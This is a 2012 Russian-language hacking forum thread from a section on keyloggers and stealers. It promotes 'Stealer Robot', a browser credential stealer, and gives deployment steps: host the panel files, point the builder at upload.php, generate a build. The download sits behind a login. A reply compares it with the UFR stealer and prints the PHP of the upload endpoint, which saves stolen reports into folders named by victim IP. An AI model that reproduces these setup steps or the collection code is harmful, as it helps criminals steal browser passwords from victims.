1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Stealer Robot.

Тема в разделе "Кейлоггеры | Стиллеры | Грабберы", создана пользователем Ltybcrf, 24 окт 2012.

1. TopicStarter Overlay
    Ltybcrf

Ltybcrf Гость

Безымянный555.png

Поддерживаемые браузеры:
    - Internet explorer
    - Chrome
    - Firefox
    - Opera
    - Safari
    Давим кнопку Show upload files и заливаем файлы из архива на хостинг
    Указываем в стиллере ссылку на ваш сайт с upload.php куда вы залили все файлы
    И генерируете билд стиллера

**Скрытый текст: Для просмотра скрытого текста Вы должны авторизоваться.**

Пожалуйста Зарегистрируйтесь или Войдите для того чтоб увидеть текст сообщения!

• Like Like x 4
    Метки:
  2. TopicStarter Overlay
    t0uchinthev0id

t0uchinthev0id Гость

Объясните, пожалуйста, принципиальные отличия от UFR. Плюсы, минусы.

3. EEjester

EEjester hack_the_god

Симпатии:
    957
    UFR шлет отчеты на ftp и на mail, это несомненно +. Но огромный минус UFR на мой взгляд что не в txt формате допустим. Я не могу скачать отчет с мобилки и прочесть его. Это минус. А этот стиллер шлет отчеты на веб панель. Тобишь на сайт. Его можно посетить с мобилки и посмотреть отчеты. Это + на мой взгляд. Ещё минус UFR что его троян большенство крипторов приводят в неработоспособность. Так же в UFR присуцтвует очень хорошая, функциональная, красивая панель управления (билдер), ещё 1 +.
    Ну а теперь пару ньюансов о "Stealer Robot", и так, начнем.
    Файл "upload.php" содержит вот такой код:
    <?php $uploads = './uploads'; if ($_FILES***91;'file'***93;***91;'error'***93; == UPLOAD_ERR_OK) { $filename = basename($_FILES***91;'file'***93;***91;'name'***93; $uploadedFile = $_FILES***91;'file'***93;***91;'tmp_name'***93;; $ipAddress = $_SERVER***91;'REMOTE_ADDR'***93;; $directory = "{$uploads}/{$ipAddress}"; if (!file_exists($directory)) mkdir($directory, 0777); move_uploaded_file($uploadedFile, "{$directory}/{$filename}"); } ?>
    На этот файл нужно указывать ссылку в билдере. Только вот непонятно каким хером он будет принимать отчеты с трояна...

4. TopicStarter Overlay
    Vladimir

Vladimir Гость

хорошая программа

5. Apple96

Apple96

Симпатии:
    667
    Не хватало одно сообщения, чтоб посмотреть, что за хайдом))

• Like Like x 1
  6. TopicStarter Overlay
    Slavik007

Slavik007 Гость

ufr по моему мнению лучше

Поделиться этой страницей

Загрузка...